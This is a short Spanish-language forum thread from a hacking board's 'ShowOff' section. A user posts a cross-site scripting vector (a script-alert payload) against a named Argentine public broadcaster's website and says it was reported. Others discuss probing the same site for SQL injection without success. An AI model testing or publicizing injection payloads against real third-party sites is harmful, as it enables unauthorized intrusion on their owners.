Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: trackerkey en Enero 30, 2013, 03:30:58 PM

Título: XSS Tv Publica argentina
Publicado por: trackerkey en Enero 30, 2013, 03:30:58 PM
(http://i.imgur.com/GiLAZeR.png?1)

Web: www.tvpublica.com.ar/
Vector: "><script>alert(/trackerkey - Underc0de/)</script>
Autor: Trackerkey
Reportado: SI
Título: Re:XSS Tv Publica argentina
Publicado por: Alex en Enero 30, 2013, 03:44:18 PM
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!
Título: Re:XSS Tv Publica argentina
Publicado por: trackerkey en Enero 31, 2013, 01:32:39 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
si tengo mis sospechas de que también hay sqli, a pesar de que no se muestre el error pero asumo que es porque no tienen mysql_error()

saludos!

Probe si era vulnerable sqli pero al parecer no,porlomenos yo no pude

Saludos
Sólo texto | Texto con Imágenes